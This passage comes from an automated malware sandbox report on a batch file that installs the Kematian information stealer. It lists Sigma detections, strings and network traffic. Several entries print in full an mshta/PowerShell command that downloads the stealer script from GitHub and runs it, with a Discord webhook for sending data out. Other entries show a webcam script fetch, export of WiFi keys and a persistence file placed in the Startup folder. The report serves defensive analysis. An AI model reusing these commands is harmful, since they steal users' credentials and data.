'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex",0)) , ProcessId: 7640, ProcessName: mshta.exe
      Sigma detected: Usage Of Web Request Commands And Cmdlets
      Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: mshta vbscript:close(createobject("wscript.shell").run("powershell $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex",0)) , CommandLine: mshta vbscript:close(createobject("wscript.shell").run("powershell $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex",0)) , CommandLine|base64offset|contains: m, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\thegreatestexecutor.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6592, ParentProcessName: cmd.exe, ProcessCommandLine: mshta vbscript:close(createobject("wscript.shell").run("powershell $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex",0)) , ProcessId: 7640, ProcessName: mshta.exe
      Sigma detected: Use Short Name Path in Command Line
      Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: "C:\Windows\system32\netsh.exe" wlan export profile folder=C:\Users\user~1\AppData\Local\Temp\wifi key=clear, CommandLine: "C:\Windows\system32\netsh.exe" wlan export profile folder=C:\Users\user~1\AppData\Local\Temp\wifi key=clear, CommandLine|base64offset|contains: V, Image: C:\Windows\System32\netsh.exe, NewProcessName: C:\Windows\System32\netsh.exe, OriginalFileName: C:\Windows\System32\netsh.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7696, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\netsh.exe" wlan export profile folder=C:\Users\user~1\AppData\Local\Temp\wifi key=clear, ProcessId: 3964, ProcessName: netsh.exe
      Sigma detected: Wscript Shell Run In CommandLine
      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: mshta vbscript:close(createobject("wscript.shell").run("powershell $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex",0)) , CommandLine: mshta vbscript:close(createobject("wscript.shell").run("powershell $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex",0)) , CommandLine|base64offset|contains: m, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\thegreatestexecutor.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6592, ParentProcessName: cmd.exe, ProcessCommandLine: mshta vbscript:close(createobject("wscript.shell").run("powershell $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex",0)) , ProcessId: 7640, ProcessName: mshta.exe
      Sigma detected: Dynamic CSharp Compile Artefact
      Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1920, TargetFilename: C:\Users\user\AppData\Local\Temp\bekownh2\bekownh2.cmdline
      Sigma detected: Non Interactive PowerShell Process Spawned
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}" , CommandLine: powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\thegreatestexecutor.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6592, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}" , ProcessId: 6660, ProcessName: powershell.exe
      Sigma detected: Windows Processes Suspicious Parent Directory
      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7764, ProcessName: svchost.exe

      Data Obfuscation

      barindex
      Sigma detected: Drops script at startup location
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\System32\cmd.exe, ProcessId: 6592, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fr.bat
      Sigma detected: Dot net compiler compiles file from suspicious location
      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bekownh2\bekownh2.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bekownh2\bekownh2.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/webcam.ps1')) , ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1920, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bekownh2\bekownh2.cmdline", ProcessId: 3020, ProcessName: csc.exe

      Snort Signatures

      No Snort rule has matched

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
      Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.7:49711 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.16.123.96:443 -> 192.168.2.7:49715 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.7:49720 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.7:49721 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.7:49722 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.7:49723 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.7:49725 version: TLS 1.2
      Source: Binary string: winload_prod.pdbacroNGLLog.txt source: powershell.exe, 00000022.00000002.1801242655.000000C000006000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: powershell.exe, 00000022.00000002.1806860323.000000C000280000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: powershell.exe, 00000022.00000002.1806860323.000000C000280000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2C:\Users\user\AppData\Local\Temp\acrobat_sbx source: powershell.exe, 00000022.00000002.1806860323.000000C000280000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: powershell.exe, 00000022.00000002.1806860323.000000C000280000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: powershell.exe, 00000022.00000002.1801242655.000000C00007A000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\ source: powershell.exe, 00000022.00000002.1801242655.000000C000014000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\bekownh2\bekownh2.pdbL source: powershell.exe, 0000001F.00000002.1681630492.000002B3D8001000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ntkrnlmp.pdb source: powershell.exe, 00000022.00000002.1801242655.000000C000006000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: `C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Designer\1.0.0.20\manifest.jsonC:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Travel\1.0.0.2C:\Users\user\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\INetCookiesC:\Users\user\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\INetHistoryC:\Users\user\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\RoamingStateC:\Users\user\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SystemAppDataC:\Users\user\AppData\Local\Packages\MicrosoftWindows.UndockedDevKit_cw5n1h2txyewy\AC\INetCacheC:\Users\user\AppData\Local\Packages\MicrosoftWindows.UndockedDevKit_cw5n1h2txyewy\AC\INetCookiesC:\Users\user\AppData\Local\Packages\MicrosoftWindows.UndockedDevKit_cw5n1h2txyewy\AC\INetHistoryC:\Users\user\AppData\Local\Packages\MicrosoftWindows.UndockedDevKit_cw5n1h2txyewy\LocalCacheC:\Users\user\AppData\Local\Packages\MicrosoftWindows.UndockedDevKit_cw5n1h2txyewy\LocalStateC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logC:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log_ source: powershell.exe, 00000022.00000002.1806860323.000000C000280000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: powershell.exe, 00000022.00000002.1806860323.000000C000280000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: ;C:\Users\user\AppData\Local\Temp\bekownh2\bekownh2.pdb source: powershell.exe, 0000001F.00000002.1614835648.000002B3C127F000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: nullMicrosoft.Windows.PeopleExperienceHost_cw5n1h2txyewyMicrosoft.Windows.PinningConfirmationDialog_cw5n1h2txyewyMicrosoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewyMicrosoft.Windows.ShellExperienceHost_cw5n1h2txyewyMicrosoft.Windows.StartMenuExperienceHost_cw5n1h2txyewymicrosoft.windowscommunicationsapps_8wekyb3d8bbwepwa-vendors~left-nav-rc.b24d6b48aeb44c7b5bf6.chunk.v7[1].jspwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7[1].csspwa-left-nav-rc.68ab311bcca4f86f9ef5.chunk.v7[1].jspwa-fluent~left-nav-rc.ac5cfbeadfd63fc27ffd.chunk.v7[1].jspwa-vendors~left-nav-rc.169ce481376dceef3ef6.chunk.v7[1].css02d10d8f3b2550b1ef1c26446560bb701c8a38270558a230195db09392dbb20737529a6a49f2e46ad168f26e3c5c8a65cea482941a8b4b39108838bfb5ecefe63783e7d9aee4122ca0a40a8f1a32a54ec18e6f61ac6fe1ddb07b3a4d2bb898aa4d37196bc735aaeee1b7479ffd7be02fd8efaaa4175d538e592c451486a1643c6694292562b8278f722fccadbe11f33bd66a4e3eb075a2783d9a5c573673809970ff3d4a131ad5bd7be00ef0175c91a5db687ae5ad4c96d06a69d2085a72ec4c74a3fd35b829e52e6ca53adb996dd9ebc370f7d1d5f6ad09308d8fbfac3ef4548d34928b03e6d4fbfd13da0e2521462d4a4fc68446f101ed58b669e3dada662c921ae2be6f2c0c4f5d0612de464ac6be9b75354010d4c8c367cf25fe0bff1b169511e5e0a9d328dc1aceabc9e9eef27035aa872d65a5e2a1f519204e75e017e6ac72f8d729696026187dd059d2d97c4cab419d349e745057c40f173d46ed66a2c4d0028eef040a7ffac470afe683d9cdcc1cbec1a0a32156f64ec8d93ea2b3bdc828b5bcb9f7a25ab4d404f1bf5eee3b4351a8a0f27bb835216d17deee2fafd5df0d0984d439371960407f90ea85fb0ccfd3c500d5bb9a55eb375305d2a3b0e3C:\Users\user\AppData\Local\Publishers\8wekyb3d8bbwe\C:\Users\user\AppData\Local\Publishers\8wekyb3d8bbwe\C:\Users\user\AppData\Local\SolidDocumentsC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\C:\Users\user\AppData\Local\Temp\edge_BITS_3244_435825870\C:\Users\user\AppData\Local\Temp\edge_BITS_3244_492380506\C:\Users\user\AppData\Local\Temp\edge_BITS_3244_529259725\C:\Users\user\AppData\Local\Temp\edge_BITS_3244_600014076\C:\Users\user\AppData\Local\Temp\edge_BITS_3244_669696935\C:\Users\user\AppData\Local\Temp\edge_BITS_3244_677372717\C:\Users\user\AppData\Local\Temp\edge_BITS_3244_719535175\C:\Users\user\AppData\Local\Temp\edge_BITS_3244_867342333\C:\Users\user\AppData\Local\Temp\scoped_dir10952_1826612563C:\Users\user\AppData\Local\Temp\scoped_dir10952_1826612563C:\Users\user\AppData\Local\Temp\scoped_dir5952_991612011\C:\Users\user\AppData\Local\Temp\scoped_dir5952_991612011\C:\Users\user\AppData\Local\Temporary Internet FilesC:\Users\user\AppData\Local\VirtualStoreC:\Users\user\AppData\Local\_curlrc*struct { EncryptedKey string "json:\"encrypted_key\"" }a\8*struct { EncryptedKey string "json:\"encrypted_key\"" }HARDWARE_ACCELERATION_MODE_PREVIOUSVARIATIONS_FAILED_TO_FETCH_SEED_STREAKVARIATIONS_PERMANENT_CONSISTENCY_COUNTRYVARIATIONS_SAFE_SEED_PERMANENT_CONSISTENCY_COUNTRYVARIATIONS_SAFE_SEED_SESSION_CONSISTENCY_COUNTRY source: powershell.exe, 00000022.00000002.180124265
      Source: Binary string: ;C:\Users\user\AppData\Local\Temp\bekownh2\bekownh2.pdbhP source: powershell.exe, 0000001F.00000002.1614835648.000002B3C127F000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: powershell.exe, 00000022.00000002.1806860323.000000C000280000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: URLVISIT_COUNTnullnullnullnullroaming.lockACsettings.datAppDataSettingsLocalCacheLocalStateRoamingStateSystemAppDataTempStateTempINetCacheINetCookiesINetHistoryroaming.lockACsettings.datroaming.locksettings.datAppDataSettingsLocalCacheLocalStateRoamingStateSystemAppDataTempStateTemproaming.locksettings.datINetCacheINetCookiesINetHistoryINetCacheTempINetCookiesINetHistoryACAppDataLocalCacheLocalStateRoamingStateSettingsTempACSystemAppDataTempStateINetCacheINetCookiesINetHistoryroaming.locksettings.datAppDataSettingsLocalCacheLocalStateRoamingStateSystemAppDataTempStateTempINetCacheINetCookiesINetHistoryACAppDataLocalCacheLocalStateRoamingStateSettingsTempACSystemAppDataTempStateINetCacheINetCookiesINetHistoryAppDataSettingsLocalCacheLocalStateRoamingStateSystemAppDataTempStateACAppDataSettingsLocalCacheLocalStateRoamingStateSystemAppDataTempStateTempINetCacheINetCookiesINetHistoryACAppDataLocalCacheLocalStateRoamingStateSettingsTempACSystemAppDataTempStateINetCacheINetCookiesINetHistoryINetCacheTempINetCookiesINetHistory8wekyb3d8bbweFontsLicensesAcrobat.ses0013461513Low01647711900196354653040965466404501253020518291756064944428106536719410686412204098239075810338682561141274626120633745912371609431239919175142233959916702910371809927897192799467021039543132118371548212936081621624033982168651637223875848123857605532567238426258555860126690497522760101248284330786328925102383118691078332260465334768886793554373729364339976036455030003761760476428928852843199088814478492829461873262646760122344736274156496536702450640779625089483566512062693552811040335449697240549163071858091303015911976538618321158962136532766326573906632922725663327833706577738837663680599267300306057059748165721680495672418139447246058026730071234273748340687457734050746334954576766874417847944919793717792482009465368272948061835180110584856683818552718761857640496089750658019048275495921702144793292380079422479677965969216199254781479973218975acrobat_sbxacrocef_lowAdobeARM.logchrome.execv_debug.logdbghelp.dllDiagnosticsjusched.logofflineSymbolssymsrv.dllEXCELtmpB263.tmpwct228B.tmpwct4054.tmpwct7120.tmpwctB366.tmpwctDE6E.tmpwmsetup.logdownload.errorntkrnlmp.pdbdownload.errorwinload_prod.pdbacroNGLLog.txtAdobeNGLAcrobatDCAdobeAcrobatDCSearchEmbdIndex000003.logCURRENTLOCKLOGLOG.oldCURRENTMANIFEST-000001000003.logLOCKLOGLOG.oldMANIFEST-00000109AZ09AZ09AZdQw4!# source: powershell.exe, 00000022.00000002.1801242655.000000C000006000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: powershell.exe, 00000022.00000002.1806860323.000000C000280000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: powershell.exe, 00000022.00000002.1806860323.000000C000280000.00000004.00001000.00020000.00000000.sdmp

      Networking

      barindex
      Found Tor onion address
      Source: powershell.exe, 00000022.00000002.2055247149.000001DF1CB60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: unixxn--cap -> failermssse3avx2bmi1bmi2bitsNameTypeasn1cx16sse2*.ldb*.logchdir<nil>writechmodchowncloseLstatfalseBEGIN_auth_syncfile:FALSEarrayError&amp;&#34;&#39;https:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFounddefersweeptestRtestWexecWexecRschedhchansudoggscanmheaptracepanicsleepgcingusagefault and [...]ntohsMarchApril+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930monthLocalint16int32int64uint8slicekind=1562578125parsexxxxxGreekAdlamBamumBatakBuhidDograKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamiltls: Earlyfilesimap2imap3imapspop3shostsutf-8%s*%dtext/bad nmatchrune Ints:Ptrs:sse41sse42ssse3SHA-1P-224P-256P-384P-521ECDSA (at no IPClassPayPalreadatremoveCOMMITNORMAL_mutexDOUBLEobjectnumberstringStringFormat[]byteactiveclosedsocks5CANCELGOAWAYPADDEDBasic CookieacceptcookieexpectoriginserverExpectstatusPragmasocks LockedGetACPsysmontimersefenceselect, not GOROOTlistensocketSundayMondayFridayAugustUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13minuteseconduint16uint32uint64structchan<-<-chan Value390625, val CommonArabicBrahmiCarianChakmaCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiX25519%w%.0wAcceptServernetdnsdomaingophertelnet.localreturn.onionip+netempty rune1 rdtscppopcntcmd/goheaderAnswerLengthSTREETavx512rdrandrdseedDefaultProfileNetworkCookiesHistoryAPPDATAleveldbCashappreaddirwriteatconsolesqlite3DEFAULT_txlock_vacuum_cslikeDECIMAL\\.\UNCnumber float32float64UpgradeTrailerHEADERSReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUG:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTforcegcallocmWcpuprofallocmRunknowngctraceIO waitUNKNOWN:eventsCopySidWSARecvWSASendconnectTuesdayJanuaryOctoberMUI_StdMUI_DltinvaliduintptrSwapperChanDir using , type= Value>Convert19531259765625nil keyAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaderivedInitialExpiresSubjectwindowswsarecvwsasendlookup writetocharsetInstAltInstNopalt -> nop -> any -> Floats:avx512fos/execruntimeSHA-224SHA-256SHA-384SHA-512Ed25519MD2-RSAMD5-RSAserial:::ffff:no portanswers2.5.4.62.5.4.32.5.4.52.5.4.72.5.4.82.5.4.9amxtileamxint8amxbf16osxsave#internWeb Data.defaultIdk LmaotruncateFullPathnil PoolROLLBACK_timeout_journal_lockingGoStringhijackedNO_ERRORPRIORITYSETTINGSLocation data=%q incr=%v ping=%qif-matchlocationhttp/1.1HTTP/2.0boundaryHTTP/1.1no-cacheContinueAcceptedConflictbad instscavengepollDesctraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKno anodeCancelIoReadFileAcceptExWSAIoctlshutdownwsaioctlacceptexThursdaySaturdayFebruaryNovemberDecember%!Month(ZONEINFOSnapshotFuncTypestruct {48828125infinitystrconv.parsing ParseIntArmenianBalineseBopomofoBugineseCherokeeCyrillicDuployanEthiopicGeorgianGujaratiGurmukhiHiraganaJavaneseKatakanaKayah_LiLinear_ALinear_BMahajaniOl_ChikiPhags_PaTagbanwaTai_ThamTai_VietTifinaghUgariticVithkuqiCurveID(f
      Source: global trafficHTTP traffic detected: GET /Somali-Devs/Kematian-Stealer/raw/main/frontend-src/webcam.ps1 HTTP/1.1Host: github.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Somali-Devs/Kematian-Stealer/main/frontend-src/webcam.ps1 HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Somali-Devs/Kematian-Stealer/raw/main/frontend-src/kematian_shellcode.ps1 HTTP/1.1Host: github.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Somali-Devs/Kematian-Stealer/main/frontend-src/kematian_shellcode.ps1 HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
      Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
      Source: Joe Sandbox ViewIP Address: 185.199.109.133 185.199.109.133
      Source: Joe Sandbox ViewASN Name: TUT-ASUS TUT-ASUS
      Source: Joe Sandbox ViewASN Name: FASTLYUS FASTLYUS
      Source: Joe Sandbox ViewASN Name: GITHUBUS GITHUBUS
      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
      Source: unknownDNS query: name: ip-api.com
      Source: global trafficHTTP traffic detected: GET /ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/trace HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.cloudflare.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/trace HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.cloudflare.com
      Source: global trafficHTTP traffic detected: GET /Somali-Devs/Kematian-Stealer/releases/download/KematianBuild/kematian.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: github.com
      Source: global trafficHTTP traffic detected: GET /github-production-release-asset-2e65be/561131198/03bdc8a9-2834-4aef-a1a7-2d28a7226bb3?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240703%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240703T160852Z&X-Amz-Expires=300&X-Amz-Signature=bf5d6ce3b3c7757c8874a64bc623be15306ed51e51b0852229d79eee9986e509&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=561131198&response-content-disposition=attachment%3B%20filename%3Dkematian.bin&response-content-type=application%2Foctet-stream HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: objects.githubusercontent.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: ip-api.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /json HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: ip-api.com
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/trace HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.cloudflare.comConnection: Keep-Alive
